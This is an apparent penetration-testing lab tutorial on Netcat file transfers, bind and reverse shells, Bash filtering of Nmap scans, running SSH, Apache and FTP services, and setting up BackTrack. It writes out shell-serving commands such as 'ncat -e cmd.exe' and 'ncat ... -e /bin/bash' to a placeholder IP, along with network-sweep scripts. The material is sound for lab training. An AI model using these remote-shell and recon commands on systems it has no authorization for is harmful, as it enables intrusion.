Netcat and Bind Shells

Netcat and Bind Shells Overview

Netcat is a network connection tool that can read and write to TCP and UDP ports. It can make all kinds of network connections that act like a server and a client. It can be a web server, a mail server, a chat server, or any other kind of server. It could be used to transfer files or serve any process even a command shell.

“It is all things, to all people, for all reasons” – Steve Butler.

For this lab exercise install both Netcat and Nmap on two separate computers. Use a Linux computer like CentOS, Mint, Ubuntu, etc., and a computer running Windows 7 or Windows 8.1, Windows 10, etc..

  1. In Linux, install Nmap and Netcat (nmap installs both programs):
    In Centos:
    yum install nmap
        In Mint or Ubuntu:
    sudo apt-get install nmap
  2. In Windows download the Netcat/Ncat program (ncat.exe) and copy it to your C:\\Windows\ folder  (http://nmap.org/dist/ncat-portable-5.59BETA1.zip). You may need to whitelist if you are running an antivirus program.
  3. In Windows download and install Nmap at http://nmap.org/download.html . Use the Latest release self-installer: nmap-7.01-setup.exe

Netcat was created in 1996 and is to this day still considered a great network debugging and testing tool. In 2005 the makers of Nmap created an updated version of Netcat called Ncat that offers additional features like SSL support. Ncat is installed with Nmap for Windows. You can download an updated version of Ncat for Windows at this website: http://nmap.org/ncat/. Scroll to the bottom and look for the Windows binary.

sbd is a Netcat clone that offers encryption and runs on Windows or Linux. You can find it and many other netcat related tools here: http://packetstormsecurity.org/UNIX/netcat/

A good overview about Netcat: http://en.wikipedia.org/wiki/Netcat

 

Exercise 1 – Setup a Netcat connection between two hosts (send text)

  1. Connect to your Windows client (or any network host) and run Netcat.
  2. Copy and paste ncat.exe in your c:\\WINDOWS\ directory so that you will have it available in your command PATH
  3. Open a command prompt. The following command sets Netcat to listen verbosely on port 4444:
    ncat -lvp 4444
  4. Check with Netstat. You should see that Netcat is listening on tcp port 4444.
    netstat -an | FIND “4444”
  5. Go to your Linux client and open a terminal with root access and connect with Netcat on port 4444. If you are using Mint or Ubuntu use a sudo command before ncat:
    ncat <ip address you are connecting to>  4444
  6. You should eventually see an open connection, try type “hello” back and forth between clients.

Exercise 2 – Transfer files using Netcat (pipe to a file)

  1. In Linux use your favorite text editor and type a sentence of text. Save the file as fileshare.txt
  2. In your Windows client type this into the command prompt:
    ncat -lvp 2233 > fileshare.txt
  3. From a Linux terminal type in the following commands (start with sudo if using Mint or Ubuntu):
    ncat <the IP address> 2233 < fileshare.txt
  4. Check your Windows client to see if you received the file.
  5. How would you make the listener (the server) send the file instead of receiving it?

Exercise 3 – Bind a command prompt to a port creating a Bind Shell (the server has a shell listen )

  1. In your Windows client open a command prompt. The following sets cmd.exe to execute on port 7777 when a connection is established:
    ncat -lvp 7777 -e cmd.exe
  2. In your Linux client open a terminal window and connect with Netcat on port 7777 (start with sudo if using Mint or Ubuntu):
    ncat <the ip address to connect to> 7777
  3. If you are successful you will eventually see a Windows command shell in your Linux terminal. You bound a shell (cmd.exe) to a port and served it.

Exercise 4 – Create a reverse Bind Shell (the client sends the shell)

  1. In your Windows client open a command prompt. this sets Netcat to listen on port 7777(server):
      ncat -lvp 7777
  2. In the Linux client terminal the following command executes a bash shell on port 7777 to the listening Netcat server on the Windows client (start with sudo if using Mint or Ubuntu):
    ncat -nv <the ip address> 7777 -e /bin/bash
  3. If you are successful you will receive a shell on the Windows client that you can type bash commands. Try running an ls command. You will not see a # prompt.


Exercise 5 – World’s simplest web server (pipe a html file to a port)

  1. Create or download a simple webpage save it to the current directory and then put this command in a terminal (start with sudo if using Mint or Ubuntu).
    cat index.html | ncat -vl 80
  2. Now on another computer on your network connect to that IP address and view the webpage.

Video Tutorial

In these video tutorials, I execute the lab using BackTrack Linux

Bash Line Commands & Shell Scripting

Overview

It is useful to be able to use Bash Shell commands to gather information about a test target as well as filter that information for only the necessary useful data. For example you could use “wget” to download the contents of a web page and then sort through and filter the results for links, domains, subdomains, and IP addresses that can be tested later for vulnerable open services.

#wget “http://www.some-website.com”

You can also use Bash shell commands to filter and sort through any type of resulting text output. In the example below I run an Nmap on a LAN and then filter and sort through the results.

Exercise 1 – Scan a network for IP addresses and open ports. Sort and filter your data with Bash line commands.

Try running these steps which have useful commands:

  1. In a test network environment or one that you have permission to scan with Nmap. Try the following commands in a root terminal:
  2. Run a Nmap scan on an entire network looking for responding hosts computers and open ports:
    #nmap 192.168.1.1-254  (substitute your network’s address scheme)
  3. Output/save the results to a text file:
    #nmap 192.168.1.1-254 > scan.txt
  4. Cat the results to your terminal:
    #cat scan.txt
  5. If there are active responding computers in the network you may see the following sample line: “Nmap scan report for 192.168.1.100.” Now you can use Bash to filter the results piping to a grep command:
    #cat scan.txt | grep “report”
  6. Using the cut command and specifying a delimiter of a space (-d ” “), you can segment the text string into separate pieces based on the spaces between the words and then grab the field you need (-f 5).
    #cat scan.txt | grep “report” | cut -d ” ” -f 5
    This way the result is just the responding IP addresses from the Nmap scan. Example:
         Nmap scan report for 192.168.1.100
    Nmap scan report for 192.168.1.101
    Nmap scan report for 192.168.1.102
    becomes just:
    192.168.1.100
    192.168.1.101
    192.168.1.102 
  7. If you needed to sort the data because of redundant addresses you could use the sort command to alphabetize and remove duplicate data:
           #cat scan.txt | grep “report” | cut -d ” ” -f 5
  8. The initial Nmap command that was issued against the network, would also have shown any open ports and services that could be contacted if we wanted to filter the results to show the IP addresses followed by the open port numbers we could try and format our Bash command to search for any lines with the string “report” and or any lines with the string “open” using an escape backslash and a pipe (\|) as an OR logical operator like this:
    #cat scan.txt | grep “report\|open”
  9. Now you need to pipe to the cut command to clean the results. What would your final command look like so your output would look clean? Hint, add more pipes and more cuts to the command to strip away the unnecessary words.

 

Exercise 2 – Download a webpage, sort and filter the results for subdomains and servers 

Try running these steps which have useful commands:

  1. Download the yahoo homepage using wget:
    #wget “http://yahoo.com
  2. Examine the results using cat:
    #cat index.html
  3. Now we need to try and filter our results to subdomains of yahoo.com. To do this we can search for the lines with matching text yahoo.com:
    #cat index.html | grep “yahoo.com”
  4. Your result should be be too large to be of use. If we want to continue to filter the result we can assume that most of the domains have a “http://” in front of them, and we can try cutting the lines based on a delimiter of a colon and taking the second field
    #cat index.html | grep “yahoo.com” | cut -d “:” -f 2
  5. Now most of the lines will start with // so we can cut based on a “/” and grab the 3rd field
    #cat index.html | grep “yahoo.com” | cut -d “:” -f 2 | cut -d “/” -f 3
  6. Remove duplicate lines with sort
    #cat index.html | grep “yahoo.com” | cut -d “:” -f 2 | cut -d “/” -f 3 | sort -u
  7. If you need to remove the trailing characters from a line with a domain name. Like in this example:
    info.yahoo.com” this is a sample of training text
    then you may have a problem because the trailing character starts with a quotation mark. In this case you will need to use a backslash to escape the quotation mark and have it function as a string instead of a demarcation point. See below:
    #cat index.html | grep “yahoo.com” | cut -d “:” -f 2 | cut -d “/” -f 3 | sort -u | cut -d “\”” -f 1
  8. Save your results to text
    #cat index.html | grep “yahoo.com” | cut -d “:” -f 2 | cut -d “/” -f 3 | sort -u | cut -d “\”” -f 1 > domains.txt
  9. Output your text file to the screen and continue to sort and cut and grep until you have only unique subdomains
      #cat domains.txt | sort -u | grep “yahoo.com”
  10. Output the results overwriting the text file:
      #cat domains.txt | sort -u | grep “yahoo.com” > domains.txt

You can see from the list above that there are actually many different subdomains, services and servers

Exercise 3 – Write a Bash shell script to automate host and ping commands 

Write a shell script which will loop through a list of domain names, issuing a host command on each name, in order to return the IP address that maps to each name.

  1. Using a text editor like nano or gedit or vim open a text file and name it ips.sh
  2. You will write a shell script file that will loop through the list of subdomains you created above and saved as domains.txt. Type the following lines of text into your ips.sh file:
    #!/bin/bash
    for name in $(cat domains.txt);do
    host $name;
    done
    Save the file and exit. This script will loop through the domains and issue a host command on each domain name.
  3. Give the script file executable permissions:
    #chmod 755 ips.sh
  4. Run the scripts:
    #./ips.sh
  5. Output the results to a text file:
    #./ips.sh > server-ips.txt
  6. Clean up the results. Rewrite the shell script adding pipes, grep, cut and sort commands so that it produces only ip addresses.
  7. You should now have a file with only the IP addresses that resolve to each subdomain.

Write a shell script which will loop through a list or sequence of IP addresses, issuing a single ping command on each IP address, in order to determine which IPs will respond.

  1. Using a text editor like nano, gedit or vim open a text file and name it ping.sh
  2. You will write a shell script file that will loop through a sequence or list of IP addresses like the one you just created. Type the following lines of text into your ping.sh file:
    #!/bin/bash
    for ip in $(seq 150 250);do
    ping -c 1 192.168.1.$ip
    done

    the (seq 150 250) command when issued will loop through all the numbers between 150 and 250
    or you could use the list of ips in the text file you created earlier,
       #!/bin/bash
    for ip in $(cat server-ips.txt);do
    ping -c 1 $ip
    done
  3. Save the file, give it executable permissions, and run it:
            #chmod 755 ping.sh
    #./ping.sh
  4. Edit your script file by adding grep, cut, and sort commands to clean up the results so that only replying IP addresses are listed

Additional Study

There are more powerful tools for filtering and replacing text like awk, sed, and higher order scripting languages like Perl, Python, Ruby, Php, and regular expressions . It is worth your while to learn how to use these languages.

Run Services (SSH, FTPD, HTTPD)

Introduction

If we are going to penetrate victim computers (in the test lab) and establish communication to and from those clients so that we may execute commands and transfer files we will need some network services like SSH and FTP.

SSH 

SSH or secure shell allows you to open a secure terminal connection to a remote host, or simply to login to a remote computer in order to execute commands. This is done through a client server model where a SSH client connects to a SSH server. This type of connection is typically used to securely exchange encrypted data with a remote host, with the data being commands but can even be files using SFTP and SCP which utilize the SSH protocol. SSH was developed to replace non secure remote connection protocols like rlogin, telnet and rsh. SSH typically runs on port 22. SSH should be installed by default in BackTrack.

Manual pages on SSH and the SSHDaemon
   #man ssh
#man sshd

Generate the secure keys for the host service
#sshd-generate
or
#ssh-keygen

Start the SSH server using the scripts in the init.d directory
#/etc/init.d/ssh start

Check to see if SSH is listening on Port 22
#netstat -antp

Since you are now running an SSH server, you could download PuTTY to your Windows client and SSH into your BackTrack machine. Try this, was it successful? If not, where might the block be? Are you VPN’d? Are there any firewalls on the client or on an intermediary network device?

Stop the SSH server using the scripts in the init.d directory
#/etc/init.d/ssh stop

If you want instructions on how to install SSHD in Ubuntu go here.

HTTPD (Apache)

Apache webserver is the most widely used webserver on the internet. From a network penetration perspective a webserver could be used an exploitation tool serving up malicious files and scripts that will execute against a victims browser and computer. It could also be used as a way of transferring files to a victim machine once access has already been accomplished. Webservers by their very public nature are great way for a hacker getting information or reconnaissance about a company or target. Apache webserver is usually run on port 80.

Start the Apache2 server using the scripts in the init.d directory
#/etc/init.d/apache2 start

Verify if Apache is listening on Port 80
#netstat -antp

Your server’s accessible web directory is located in /var/www/ and is where you would put your webpages.

If you want instructions on how to install HTTPD Apache in Ubuntu go here.

FTPD

FTP or file transfer protocol is a protocol that allows you to transfer files to and from a remote machine. BackTrack has pure-FTPd installed by default. FTP operates on port 21 and transfers files on port 20.

The steps to setting up pure-FTPd:

Installation (pure-ftpd is installed by default in BackTrack but in case you are using another Linux distribution)
  #apt-get install pure-ftpd
#yum install pure-ftpd

Configuration to add a FTP user and setup an FTP directory
#groupadd ftpgroup
#useradd -g ftpgroup -d /dev/null -s /etc ftpuser
#pure-pw useradd <your ftp username> -u ftpuser -d /home/ftp/pub/<your ftp username>
You will be prompted to input a password twice
#pure-pw mkdb
#cd /etc/pure-ftpd/auth
#ln -s ../conf/PureDB 60pdb
#mkdir /home/ftp
#mkdir /home/ftp/pub
#mkdir /home/ftp/pub/<your ftp username>
#chown -R ftpuser:ftpgroup /home/ftp/pub/<your ftp username>
#/etc/init.d/pure-ftpd restart

Test you install of Pure-FTPd by FTPing to your loopback ip address
#ftp 127.0.0.1
key in your <ftp username>
key in your <ftp password>

Install & Configure BackTrack

Overview

You will need to download the BackTrack 4 or 5 operating system which you can find at: http://www.backtrack-linux.org/downloads/ . You can download either an .iso file which you will need to burn as a disc image or you can download a VMware image of the operating system which you can open as a virtual machine through the VMware Player in Windows. If you decide to use the VMware image you will need to download the free version of VMware Player as well. You can find it here: http://downloads.vmware.com/d/info/desktop_downloads/vmware_player/3_0

Once you have BackTrack installed and running you will want to know how to do the following things:

Login, the default is:
login: root
password: toor

Change the root password:
#passwd
<enter your new password twice>

Launch the Xwindows graphical user interface:
#startx

To bring up your network interfaces and be able to get online:
Check what interfaces you have (eth0, eth1, wlan0, etc.)
#ifconfig

For a wireless network card running DHCP
#iwconfig wlan0 mode managed key <your wep key>
#iwconfig wlan0 essid <your ssid>
#ifconfig wlan0 up
#dhclient wlan0

For a wired network card running DHCP
#ifconfig eth0 up
#dhclient eth0

For a manual configuration instead of running the DHCP client
#ifconfig eth0 <your desired ip address and /subnet mask -e.g. 192.168.1.100/24>
#route add default gw 192.168.1.1
#echo nameserver 192.168.1.1 > /etc/resolv.conf

Now test your connection by running a ping command or opening a website in your browser

Video Tutorial